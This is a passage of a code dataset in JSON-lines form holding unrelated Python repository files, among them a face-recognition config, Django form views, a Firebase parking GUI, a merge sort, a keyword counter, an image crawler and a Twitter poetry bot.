len(\n [m for m in [20, 30, 38] if m - 1 <= epoch])\n config.lr_func = lr_step_func\n\n # Train images preprocessed by pretrained RetinaFace\n elif config.dataset == 'APD2':\n config.rec = \"APD2/train\"\n config.mixupdir = '/home/shin/Documents/FaceMorphing/avgface'\n config.output = \"ckpt2/\" + config.output\n config.num_classes = len(next(os.walk(config.rec))[1]) # 676\n config.num_image = 12905\n config.num_epoch = 35 # 35\n config.warmup_epoch = 1\n config.val_split = 0.2\n\n def lr_step_func(epoch):\n return ((epoch + 1) / (4 + 1)) ** 2 if epoch < config.warmup_epoch else 0.1 ** len(\n [m for m in [20, 30, 33] if m - 1 <= epoch]) # [25, 30, 33]\n config.lr_func = lr_step_func\n\n # Train images preprocessed by our RetinaFace\n elif config.dataset == \"APD3\":\n config.rec = \"APD3/train\"\n config.output = \"ckpt3/\" + config.output\n config.num_classes = len(next(os.walk(config.rec))[1]) # 678\n config.num_image = 13163\n config.num_epoch = 50\n config.warmup_epoch = 1\n config.val_split = 0.2\n\n def lr_step_func(epoch):\n return ((epoch + 1) / (4 + 1)) ** 2 if epoch < config.warmup_epoch else 0.1 ** len(\n [m for m in [35, 45, 48] if m - 1 <= epoch])\n config.lr_func = lr_step_func\n\n else:\n raise NotImplementedError(f'Unsupported dataset: {config.dataset}')\n\n return config\n","repo_name":"shinying/ammai","sub_path":"hw1/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"73595361706","text":"from torch.utils.data import Dataset\nimport torch \n\nclass CustomDataset(Dataset):\n def __init__(self, images, captions, image_paths, raw_captions): #movement): \n\n self.images = images\n self.captions = captions\n self.caption_lengths = torch.LongTensor([len(i) for i in self.captions])\n self.image_paths = image_paths\n self.raw_captions = raw_captions\n #self.movement = movement\n\n def __getitem__(self, index):\n\n image = self.images[index]\n caption = self.captions[index]\n path = self.image_paths[index]\n raw_caption = self.raw_captions[index]\n #movement = self.movement[index]\n \n #t_image = self.transforms(image)\n return image, caption, path, raw_caption#, movement\n\n def __len__(self): # return count of sample we have\n\n return len(self.images)","repo_name":"BluOyster29/image_captioning_pytorch","sub_path":"scripts/image_dataset.py","file_name":"image_dataset.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"16464858672","text":"import library.check\nimport library.picker\nimport library.process\nimport tools.variants\n\nimport logging\nlog = logging.getLogger(__name__)\n\n\ndef run(args):\n checker_filter = args.filter\n pupil_filter = args.name\n\n key_picker = library.picker.KeyPicker(key=library.picker.letters_key)\n for work in classes.variants.get_all_variants():\n work_checker = work.get_checker()\n if work_checker:\n key_picker.add(work._task_id, work_checker)\n\n if args.all:\n for checker in key_picker.all(checker_filter):\n list(checker.Check(pupil_filter))\n return\n\n checker = key_picker.get(flt=checker_filter)\n if checker:\n result = ['ФИО\\tОтметка']\n for pupil_result in checker.Check(pupil_filter):\n if pupil_result:\n result.append(f'{pupil_result._pupil.GetFullName(surnameFirst=True)}\\t{pupil_result._mark}')\n\n library.process.pbcopy('\\n'.join(result), name='names and marks')\n\n\ndef populate_parser(parser):\n parser.add_argument('-f', '--filter', help='Filter test')\n parser.add_argument('-n', '--name', help='Filter pupil')\n parser.add_argument('--all', '--all', help='Parse all forms matching filter', action='store_true')\n parser.set_defaults(func=run)\n","repo_name":"burmisha/latex","sub_path":"tools/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
+{"seq_id":"35926255533","text":"try:\n \n horas_trabajadas = float(input(\"Ingresa el número de horas trabajadas: \"))\n tarifa_por_hora = float(input(\"Ingresa la tarifa por hora: \"))\n\n \n if horas_trabajadas <= 40:\n salario_bruto = horas_trabajadas * tarifa_por_hora\n else:\n horas_normales = 40\n horas_extras = horas_trabajadas - 40\n salario_bruto = (horas_normales * tarifa_por_hora) + (horas_extras * tarifa_por_hora * 1.5)\n\n \n print(\"El salario bruto es:\", salario_bruto)\n\nexcept ValueError:\n print(\"Entrada no válida. Por favor, ingresa valores numéricos.\")\n","repo_name":"Didi-an/tarea1_Diana_Cerna","sub_path":"Capitulo 3/Ejercicio 2.py","file_name":"Ejercicio 2.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"36028876340","text":"from Benchmark_TLE_TDOAs import Benchmark_TLE_TDOAs\nfrom Authentication_Algorithms.Authentication_Algorithm_Interface import Authentication_Algorithm\nfrom TimingErrors.NormalDistributed_DynamicError import NormalDistributed_DynamicError\nfrom Signal_Source.SignalSourceInterface import SignalSource\n\nimport numpy as np\n\n\nclass Benchmark_SingnalSource:\n def __init__(self, repetitions: int, total_TLE_file: str):\n self.tle_file = total_TLE_file\n self.repetitions = repetitions\n self.ben_core = Benchmark_TLE_TDOAs(self.tle_file)\n self.ssList = []\n self.ssUtilization = []\n self.eval_alg_list = []\n self.eval_alg_names = []\n\n def __prepare_utilization(self, special_utilization: [float]):\n special_utilization = np.array(special_utilization)\n if np.sum(special_utilization) <= 1.0:\n # the utilization is given in percent\n special_repetitions = np.array(special_utilization * self.repetitions).astype(int)\n elif np.sum(special_utilization) == self.repetitions:\n # the utilization is given in repetitions\n special_repetitions = np.array(special_utilization).astype(int)\n else:\n # the utilization is given in a relative rate\n special_repetitions = np.array(special_utilization / np.sum(special_utilization) * self.repetitions).astype(int)\n return special_repetitions\n\n def make_log_time_scale(self, start: float, stop: float, amount: int):\n return np.logspace(start, stop, num=amount, endpoint=True, base=10)\n\n def add_SignalSource(self, sSource: SignalSource, utilization: float):\n self.ssList.append(sSource)\n self.ssUtilization.append(utilization)\n\n def set_Algorithms(self, eval_algs: [Authentication_Algorithm], eval_algs_names: [str]):\n self.eval_alg_list = eval_algs\n self.eval_alg_names = eval_algs_names\n\n # This method is used to compare dynamic ranges of measurement amounts, receiver amounts and receiver diameter.\n def measurement_dynamics(self, errors_std: float, measurements_amounts: [int], measurements_time_interval: float,\n receiver_amounts: [int], receiver_dias_min: [float], receiver_dias_max: [float],\n save_folder_path: str):\n # create the error model\n error_model = NormalDistributed_DynamicError(0, errors_std)\n # convert the special_utilizations to special_repetitions\n special_repetitions = self.__prepare_utilization(self.ssUtilization)\n # prepare the data-collection\n true_positive_list = [[] for i in range(len(measurements_amounts))] # true_positive_list[measurements][receivers][diameter][alg] = value\n false_positive_list = [[] for i in range(len(measurements_amounts))]\n false_negative_list = [[] for i in range(len(measurements_amounts))]\n true_negative_list = [[] for i in range(len(measurements_amounts))]\n correct_list = [[] for i in range(len(measurements_amounts))] # correct_list[measurements][receivers][diameter][alg] = value\n dist_total_list = [[] for i in range(len(measurements_amounts))] # dist_total_list[measurements][receivers][diameter][alg] = avg distance in km\n # go through each measurement_amount\n for i_meas in range(len(measurements_amounts)):\n #print(f\"VERBOSE:Ben_sig.md.measurements: {i_meas + 1}/{len(measurements_amounts)}.\")\n for i_rec in range(len(receiver_amounts)):\n #print(f\"VERBOSE:Ben_sig.md.rec_am: {i_rec + 1}/{len(receiver_amounts)}.\")\n temp_tp = [] # temp_true_positive_list[diameter][alg] = value\n temp_fn = []\n temp_fp = []\n temp_tn = []\n temp_co = []\n temp_dist = []\n for i_dia in range(len(receiver_dias_min)):\n print(f\"VERBOSE:Ben_sig.md.measurements - rec_am - rec_dia: 
{i_meas + 1}/{len(measurements_amounts)} - {i_rec + 1}/{len(receiver_amounts)} - {i_dia + 1}/{len(receiver_dias_min)}.\")\n tp_values = np.zeros(len(self.eval_alg_list))\n fn_values = np.zeros(len(self.eval_alg_list))\n fp_values = np.zeros(len(self.eval_alg_list))\n tn_values = np.zeros(len(self.eval_alg_list))\n co_values = np.zeros(len(self.eval_alg_list))\n dist_values = np.zeros(len(self.eval_alg_list))\n for i_spec in range(len(special_repetitions)):\n curr_repetition = special_repetitions[i_spec]\n curr_ss = self.ssList[i_spec]\n curr_val = curr_ss.is_authentic()\n for i_rep in range(curr_repetition):\n receiver_list = self.ben_core.get_receivers(receiver_amounts[i_rec], receiver_dias_min[i_dia],\n receiver_dias_max[i_dia])\n measurement_times = self.ben_core.get_measurement_times(measurements_amounts[i_meas],\n measurements_time_interval)\n sender_found, sender_index, sender_pos = curr_ss.get_positions_TEME(receiver_list, measurement_times)\n if sender_found:\n sender_valid = self.ben_core.verify_sender_visibility(receiver_list, measurement_times, sender_pos)\n else:\n sender_valid = False\n measurement_times = self.ben_core.get_measurement_times(measurements_amounts[i_meas], measurements_time_interval)\n while not sender_valid:\n sender_found, sender_index, sender_pos = curr_ss.get_positions_TEME(receiver_list, measurement_times)\n if sender_found:\n sender_valid = self.ben_core.verify_sender_visibility(receiver_list, measurement_times, sender_pos)\n else:\n sender_valid = False\n measurement_times = self.ben_core.get_measurement_times( measurements_amounts[i_meas], measurements_time_interval)\n sender_name = curr_ss.get_names()[sender_index]\n # execute the simulation\n tp, fn, fp, tn, corr, dist = self.ben_core.perform_mesaurement(receiver_list,\n self.eval_alg_list, sender_pos,\n measurement_times, curr_val,\n sender_name,\n error_model)\n tp_values = tp_values + tp\n fn_values = fn_values + fn\n fp_values = fp_values + fp\n tn_values = tn_values + tn\n co_values = co_values + corr\n dist_values = dist_values + dist\n temp_tp.append(tp_values)\n temp_fn.append(fn_values)\n temp_fp.append(fp_values)\n temp_tn.append(tn_values)\n temp_co.append(co_values)\n temp_dist.append(dist_values)\n true_positive_list[i_meas].append(temp_tp)\n false_positive_list[i_meas].append(temp_fp)\n false_negative_list[i_meas].append(temp_fn)\n true_negative_list[i_meas].append(temp_tn)\n correct_list[i_meas].append(temp_co)\n dist_total_list[i_meas].append(temp_dist)\n # prepare the results\n correct_list = np.array(correct_list) # correct_list[measurements][receivers][diameter][alg] = value\n correct_list = correct_list / self.repetitions * 100 # for values in [%]\n true_positive_list = np.array(true_positive_list)\n false_positive_list = np.array(false_positive_list)\n false_negative_list = np.array(false_negative_list)\n true_negative_list = np.array(true_negative_list)\n # save results in files\n entries = len(receiver_dias_max)*len(self.eval_alg_list)*len(measurements_amounts)*len(receiver_amounts)\n true_positive_list = true_positive_list.reshape(entries)\n false_positive_list = false_positive_list.reshape(entries)\n false_negative_list = false_negative_list.reshape(entries)\n true_negative_list = true_negative_list.reshape(entries)\n correct_list = correct_list.reshape(entries)\n np.savetxt(save_folder_path+\"/data_tp.csv\", true_positive_list, delimiter=\",\")\n np.savetxt(save_folder_path+\"/data_fp.csv\", false_positive_list, delimiter=\",\")\n np.savetxt(save_folder_path+\"/data_fn.csv\", 
false_negative_list, delimiter=\",\")\n np.savetxt(save_folder_path+\"/data_tn.csv\", true_negative_list, delimiter=\",\")\n np.savetxt(save_folder_path+\"/data_acc.csv\", correct_list, delimiter=\",\")\n\n\n\n\n","repo_name":"ErJedermann/orbitTDOAsignatures","sub_path":"Benchmark_SignalSources.py","file_name":"Benchmark_SignalSources.py","file_ext":"py","file_size_in_byte":9403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"7171196496","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 28 21:45:14 2023\n\n@author: Dell\n\"\"\"\n\n# Demo file for Spyder Tutorial\n# Hans Fangohr, University of Southampton, UK\n\ndef solution(n):\n str_n = str(n)\n part1, part2 = str_n[:len(str_n)//2], str_n[len(str_n)//2:]\n if (sum([int(i) for i in part1]) == sum([int(j) for j in part2])):\n return True\n return False\n \nnumber = 1230\nprint(solution(number))\n\nprint(number)\n","repo_name":"ruzannaghazaryan/Tutorials-Studying","sub_path":"Untitled Folder/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"10381563550","text":"from django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom .models import *\nfrom halls.models import *\nfrom django.contrib import auth ,messages\nfrom django.contrib.auth import forms\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import *\nfrom django.core.mail import send_mail, BadHeaderError\nfrom django.shortcuts import render, get_object_or_404\nfrom django.conf import settings\n\n\n\ndef index(request):\n hm_picz = home_img.objects.all()\n return render(request, 'projects/index.html')\n\n\n# Create your views here \n#login page\ndef user_login(request):\n if request.user.is_authenticated:\n return redirect('index')\n else:\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n\n user = auth.authenticate(username=username, password=password)\n\n if user is not None:\n auth.login(request,user)\n messages.success(request, 'Welcome to Eazyskul '+user.username)\n return redirect('index') \n else:\n messages.error(request, 'Invalid credentials')\n return redirect('login')\n else:\n return render(request, 'registration/login.html', {})\n\n\n#register function \ndef register(request):\n if request.user.is_authenticated:\n return redirect('index')\n user_form = UserRegistrationForm(request.POST)\n if request.method == 'POST':\n username = request.POST['username']\n email = request.POST['email']\n password = request.POST['password']\n password2 = request.POST['password2']\n\n if password == password2:\n if User.objects.filter(username=username).exists():\n messages.info(request, 'Username already taken')\n return redirect('signup')\n elif User.objects.filter(email=email).exists():\n messages.info(request, 'Email already taken or Invalid ')\n return redirect('signup')\n else:\n user = User.objects.create_user(username=username,email=email, password=password)\n user.save()\n messages.success(request, 'Registered successfully you can now log in')\n return redirect('login')\n else:\n messages.info(request, 'Passwords do not match') \n return redirect('signup') \n else:\n user_form = UserRegistrationForm()\n return render(request,'registration/signup.html',{'user_form': user_form})\n\n\n\n\n\n#exam page\n@login_required(login_url = 'login')\ndef exam(request):\n\n if request.method == 'POST':\n exform = examzForm(request.POST)\n if exform.is_valid():\n exform.save()\n subject = \"Eazyskul Contact request\"\n body = {\n 'name' : exform.cleaned_data['name'],\n 'email' :exform.cleaned_data['email'],\n 'reg_no' : exform.cleaned_data['reg_no'],\n 'department' : exform.cleaned_data['department'],\n 'description' : exform.cleaned_data['description'] ,\n 'school' : exform.cleaned_data['school'] ,\n }\n message = \"\\n\\n\" .join(body.values())\n\n try:\n send_mail(subject, message ,settings.EMAIL_HOST_USER, ['kingofgreatnezzz@gmail.com'])\n except BadHeaderError:\n return HttpResponse('invalid header found')\n messages.success(request,\"Request sent.You'll get a response in not less than 24 hours. Please check your mails to avoid missing communication. 
Thanks\")\n return render(request, \"projects/exam.html\", {'exform': exform})\n else:\n messages.error(request, 'Invalid form submission.')\n messages.error(request, exform.errors)\n else: \n exform = examzForm()\n \n return render(request,\"projects/exam.html\", {\n \"exform\": exform,\n }) \n\n#contactz_form function \n@login_required(login_url = 'login')\ndef contact(request):\n if request.method == 'POST':\n contformz = ContactzForm(request.POST)\n if contformz.is_valid():\n contformz.save()\n subject = \"Eazyskul Contact request\"\n body = {\n 'name' : exform.cleaned_data['name'],\n 'email' :exform.cleaned_data['email'],\n 'reg_no' : exform.cleaned_data['reg_no'],\n 'department' : exform.cleaned_data['department'],\n 'description' : exform.cleaned_data['description'] ,\n 'school' : exform.cleaned_data['school'] ,\n }\n message = \"\\n\\n\" .join(body.values())\n\n try:\n send_mail(subject, message ,settings.EMAIL_HOST_USER, ['kingofgreatnezzz@gmail.com'])\n except BadHeaderError:\n return HttpResponse('invalid header found')\n messages.success(request,\"Request sent.You'll get a response in not less than 24 hours. Please check your mails to avoid missing communication. Thanks\")\n return render(request, \"projects/contact.html\", {'contformz': contformz})\n else:\n messages.error(request, 'Invalid form submission.')\n messages.error(request, contformz.errors)\n else: \n contformz = ContactzForm()\n \n\n return render(request,\"projects/contact.html\", {\n \"contformz\": contformz, \n })\n\n#project page\n@login_required(login_url = 'login')\ndef project(request):\n if request.method == 'POST':\n profom = GroupFormProject(request.POST)\n if profom.is_valid():\n profom.save()\n subject = \"Eazyskul Project request\"\n body = {\n 'name' : profom.cleaned_data['name'],\n 'email' :profom.cleaned_data['email'],\n 'regno' : profom.cleaned_data['regno'],\n 'message' : profom.cleaned_data['message'],\n 'phone' : profom.cleaned_data['phone'],\n 'department' : profom.cleaned_data['department'],\n 'project_topic' : profom.cleaned_data['project_topic'] ,\n 'school' : profom.cleaned_data['school'] ,\n }\n message = \"\\n\\n\" .join(body.values())\n\n try:\n send_mail(subject, message ,settings.EMAIL_HOST_USER, ['kingofgreatnezzz@gmail.com'])\n except BadHeaderError:\n return HttpResponse('invalid header found')\n messages.success(request,\"Request sent.You'll get a response in not less than 24 hours. Please check your mails to avoid missing communication. 
Thanks\")\n return render(request, \"projects/project.html\", {'profom': profom})\n else:\n messages.error(request, 'Invalid form submission.')\n messages.error(request, profom.errors)\n else: \n profom = GroupFormProject()\n \n return render(request,\"projects/project.html\", {\n \"profom\": profom, \n }) \n\n#about page\ndef about(request):\n abt1 = about_picz_memebers.objects.all()\n return render(request, \"projects/about.html\", {\n \"abt1\": abt1\n })\n\n#work (EAZY SKULL) page AT \n@login_required(login_url = 'login')\ndef work(request):\n work1 = workz.objects.all()\n\n return render(request,\"projects/work.html\", {\n \"work1\" : work1\n })\n\n# pd page \n@login_required(login_url = 'login')\ndef PD(request):\n pd1= pd.objects.all()\n return render(request,\"projects/PD.html\",{\n \"pd1\" :pd1\n })\n\ndef terms_condition(request):\n return render(request, 'projects/terms_condition.html')","repo_name":"kingofgreatnezzz/eazyy","sub_path":"imt/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"17211885185","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jun 8 23:02:47 2023\r\n\r\n@author: Timotei\r\n\"\"\"\r\n\r\n# Import the required libraries\r\nimport tkinter as tk\r\nimport pyrebase\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# connecting to the Firebase databae\r\nprint('Connecting to firebase database')\r\n\r\nconfig = {\r\n 'apiKey': 'AIzaSyAbXlaAYcsovACZIAygJEo9nGEue3d4Hyw',\r\n 'authDomain': 'parking-iiotca.firebase.com',\r\n 'databaseURL': 'https://parking-iiotca-default-rtdb.firebaseio.com/',\r\n 'storageBucket': 'parking-iiotca.appspot.com'\r\n}\r\n\r\nfirebase = pyrebase.initialize_app(config)\r\n\r\n\r\n\r\n\r\n# Create an instance of tkinter frame or window\r\nwin = tk.Tk(className='Parking System')\r\n\r\n# Set the size of the tkinter window\r\nwin.geometry(\"700x350\")\r\n\r\n# Define a function update the label text\r\ndef on_click():\r\n db = firebase.database()\r\n data = db.get()\r\n print(data.val())\r\n if 'Free parking spaces' in data.val():\r\n label[\"text\"] = 'Free parking spaces: ' + str(data.val()['Free parking spaces'])\r\n else:\r\n label['text'] = 'Free parking spaces: None'\r\n \r\n# Define a function update the label text\r\ndef on_click1():\r\n db = firebase.database()\r\n data = db.get()\r\n \r\n divider = data.val()['Frames on']\r\n data = data.val()['Frames free']\r\n \r\n for name in list(data.keys()):\r\n data[name] = data[name]/divider * 100\r\n \r\n names = list(data.keys())\r\n values = list(data.values())\r\n\r\n plt.bar(range(len(data)), values, tick_label=names)\r\n plt.show()\r\n \r\n\r\n\r\n\r\n# Title\r\ntitle = tk.Label(win, text=\"Parking System\",\r\nfont=('Calibri 20 bold'))\r\ntitle.pack(pady=20)\r\n\r\n# Create a label widget\r\nlabel = tk.Label(win, text=\"Click the button bellow to see which parking slots are free\",\r\nfont=('Calibri 15'))\r\nlabel.pack(pady=20)\r\n\r\n# Create a button to update the label widget\r\nb = tk.Button(win, text=\"Get parking slots\", command=on_click)\r\nb.pack(pady=20)\r\n\r\n# Create a button to update the label widget\r\nb1 = tk.Button(win, text=\"Get parking statistics\", command=on_click1)\r\nb1.pack(pady=20)\r\n\r\n\r\nwin.mainloop()","repo_name":"Horiutu/ProiectIIOTCA","sub_path":"parking_app.py","file_name":"parking_app.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"25235383092","text":"# TO-DO: complete the helpe function below to merge 2 sorted arrays\ndef merge( arrA, arrB ):\n # prepopulating array with zeroes so it runs faster\n # elements = len( arrA ) + len( arrB )\n # merged_arr = [0] * elements\n merged_arr = []\n # TO-DO\n # while the left and right arrays still have items\n while arrA and arrB:\n left_list_item = arrA[0]\n right_list_item = arrB[0]\n\n if(left_list_item < right_list_item):\n merged_arr.append(left_list_item)\n arrA.pop(0)\n else:\n merged_arr.append(right_list_item)\n arrB.pop(0)\n\n\n\n while arrA:\n merged_arr.append(arrA[0])\n arrA.pop(0)\n\n\n while arrB:\n merged_arr.append(arrB[0])\n arrB.pop(0)\n\n return merged_arr\n\n\n# TO-DO: implement the Merge Sort function below USING RECURSION\ndef merge_sort( arr ):\n list_len = len(arr)\n # TO-DO\n if (list_len < 2):\n return arr\n\n left = arr[:list_len // 2]\n right = arr[list_len // 2:]\n\n left = merge_sort(left)\n right = merge_sort(right)\n\n return merge(left, right)\n\n\n# STRETCH: implement an in-place merge sort algorithm\ndef merge_in_place(arr, start, mid, end):\n # TO-DO\n\n return arr\n\ndef merge_sort_in_place(arr, l, r):\n # TO-DO\n\n return arr\n\n\n# STRETCH: implement the Timsort function below\n# hint: check out https://github.com/python/cpython/blob/master/Objects/listsort.txt\ndef timsort( arr ):\n\n return arr\n\narr1 = [1, 5, 8, 4, 2, 9, 6, 0, 3, 7]\n\nprint(merge_sort(arr1))","repo_name":"ElijahMcKay/Sorting","sub_path":"src/recursive_sorting/recursive_sorting.py","file_name":"recursive_sorting.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"}
+{"seq_id":"7811763667","text":"'''\nImproved keyword counter using AC-automata\n'''\n\nimport ahocorasick\nimport json\nfrom pathlib import Path\nimport re\n\nfiles = ['attitude.json', 'background.json', 'content.json', 'crime.json']\n\nfilepaths = [Path(__file__).parent.joinpath('data').joinpath(filename) for filename in files]\ndata = {}\nfor filepath in filepaths:\n with open(filepath, mode='r', encoding='utf-8') as jsonfile:\n data = dict(json.load(jsonfile), **data)\n\nautomaton = ahocorasick.Automaton()\nidx = 0\nempty_dict = {}\nfor key, value in data.items():\n for word in value:\n automaton.add_word(word, (idx, word, key))\n empty_dict[key] = 0\n idx += 1\n\nautomaton.make_automaton()\n\nneg = re.compile(r'(未|否|不|未能|未曾|無)$')\n\n\ndef get_keys():\n return empty_dict.keys()\n\n\ndef count_words(text: str) -> dict:\n dic = empty_dict.copy()\n for end_index, (_, original_value, keyword) in automaton.iter(text):\n start_index = end_index - len(original_value) + 1\n if not neg.match(text[max(start_index - 2, 0): start_index]):\n dic[keyword] = 1\n return dic\n\n\nif __name__ == '__main__':\n haystack = '不公然侮辱罪幹你娘勒我學他那種機掰個性,說那種機掰懶叫話幹你娘雞掰勒幹你娘勒你吃洨(閩南語,泛指精液)也沒有人要看你知道幹你娘幹你娘你連屁都不如嘛,你什麼洨'\n print(count_words(haystack))\n","repo_name":"bearrrrrrro/LawHackson","sub_path":"keyword_counter.py","file_name":"keyword_counter.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"26690837249","text":"import os\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom multiprocessing import Process, Value, Array\nfrom multiprocessing import Pool\nimport time\n\nclass RelatedImageCrawler:\n def __init__(self):\n options = Options()\n options.add_argument('--headless')\n self.driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)\n self.delay = 3 # seconds\n\n def worker(self,link):\n link.click()\n time.sleep(2)\n result_container = self.driver.find_element_by_id(\"islsp\")\n all_result_links = result_container.find_elements_by_tag_name('img')\n for l in all_result_links:\n src = l.get_attribute('src')\n if not src.startswith('data:image') and \"https://encrypted-tbn0.gstatic.com/\" not in src:\n return src\n\n def crawl(self, related_url, max = 30):\n # def worker(link):\n # link.click()\n # time.sleep(2)\n # result_container = self.driver.find_element_by_id(\"islsp\")\n # all_result_links = result_container.find_elements_by_tag_name('img')\n # for l in all_result_links:\n # src = l.get_attribute('src')\n # if not src.startswith('data:image') and \"https://encrypted-tbn0.gstatic.com/\" not in src:\n # print(src)\n # return src\n origin_urls = []\n self.driver.get(related_url)\n container_elem = self.driver.find_element_by_id(\"islrg\")\n all_links = container_elem.find_elements_by_tag_name('a')\n count = 0\n with Pool() as pool:\n for b in all_links[:]:\n href = b.get_attribute('href')\n if href is None:\n if count == max:\n return origin_urls\n count += 1\n b.click()\n time.sleep(2)\n result_container = self.driver.find_element_by_id(\"islsp\")\n all_result_links = result_container.find_elements_by_tag_name('img')\n for l in all_result_links:\n src = l.get_attribute('src')\n if not src.startswith('data:image') and \"https://encrypted-tbn0.gstatic.com/\" not in src:\n origin_urls.append(src)\n return origin_urls\n","repo_name":"vanchung1995/google_image_download","sub_path":"related_image_crawler.py","file_name":"related_image_crawler.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"30183683888","text":"import tweepy\nfrom credentials import *\nimport markovify\nimport random\nimport json\nimport re\nfrom pymorphy2 import MorphAnalyzer\nimport string\n\nmorph = MorphAnalyzer()\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth)\n\narray = []\nwith open(\"starter_data.txt\",\"r+\",encoding=\"utf-8\") as f:\n array.append(f.read())\n# ran = \"пивка! домой! думаю! размышляю! вот подумал я... что не так-то все просто. Так, да. водочки бы -- медвежий угол которая\".split(\" \")\n\n\nclass war_listener(tweepy.StreamListener):\n def make_sentence(self,arr):\n st = \" \".join(arr)\n model = markovify.Text(st, state_size=1)\n sent = \"\"\n while True:\n gn = model.make_short_sentence(60)\n if not gn:\n continue\n if len(gn) >= 25:\n exclude = \",.?!*%@:;\\\"\\'()[]+=^~`\"\n sent = ''.join(ch for ch in gn if ch not in exclude).lower()\n break\n return sent\n\n def replace_word(self, word):\n fls = [\"fet_mirror\",\"pushkin_mirror\",\"krivulin_mirror\"]\n dct = {}\n with open(random.choice(fls)+\".txt\",\"r\",encoding=\"utf-8\") as f:\n dct = json.loads(f.read())\n try:\n features = str(morph.parse(word)[0].tag).split()\n if features[0] in [\"PREP\", \"PRCL\"]:\n return word # предлоги и частицы не заменяются -- потому что pymorphy не учитывает управление предлогов и модальность, которую вн��сят частицы\n # print(features)\n if features[0] in dct:\n if len(features) == 2:\n wfin = morph.parse(random.choice(dct[features[0]]))[0].inflect({tg for tg in features[1].split(\",\")}).word\n else:\n wfin = random.choice(dct[features[0]]) # в случае, если это, например, предлог, у и него нет непостоянных признаков\n\n if word[0].isupper():\n wfin = wfin[0].upper() + wfin[1:]\n # print(wfin)\n return wfin\n else:\n return word\n except:\n print(\"no\")\n return word\n\n def generator(self, arr):\n sent = self.make_sentence(arr)\n sent3 = \"\"\n len3 = 0\n len3b = random.choice(range(1,5))\n sent2 = \" \".join([self.replace_word(w) for w in sent.split()])\n last_tweet = [(word,morph.parse(word)[0]) for word in arr[len(arr)-1].split()]\n cathegory = random.choice(['NOUN','VERB',\"ADVB\"])\n for word in last_tweet:\n if cathegory in word[1].tag:\n if len3 < len3b:\n if cathegory == \"NOUN\":\n sent3 += word[1].inflect({'nomn'}).word + \" \"\n len3 += 1\n elif cathegory == \"VERB\":\n sent3 += word[1].normalized.word + \" \"\n len3 += 1\n else:\n sent3 += word[0] + \" \"\n len3 += 1\n if len3 < len3b:\n sent3 += \"— \"*(len3b-len3)\n stroph = random.choice([1,2,3,4,0]) # какой строкой идет отзеркаленная: первой, второй или ее нет вовсе\n if stroph == 1:\n fin = sent + \"\\n\"*random.choice(range(1,3)) + sent2 + \"\\n\"*random.choice(range(2,4)) + sent3\n elif stroph == 2:\n fin = sent2 + \"\\n\"*random.choice(range(1,3)) + sent + \"\\n\"*random.choice(range(2,4)) + sent3\n elif stroph in [3,4]:\n fin = sent + \"\\n\" * random.choice(range(1, 3)) + self.make_sentence(arr) + \"\\n\" * random.choice(range(2, 4)) + sent3\n else:\n fin = sent + \"\\n\"*random.choice(range(1,3)) + sent + \"\\n\"*random.choice(range(2,4)) + sent3\n return fin\n\n def on_status(self, status):\n if status.user.screen_name != \"PoemsWar\":\n numb_tweet = 0 # отслеживает, сколько твитов добавляется в алоритм\n delay_const = 20 # каждые сколько твитов генерируется стихотворение\n txt = \"\"\n try:\n txt = status.extended_tweet['full_text']\n except:\n txt = status.text\n print('Reply to user @{}, tweet: 
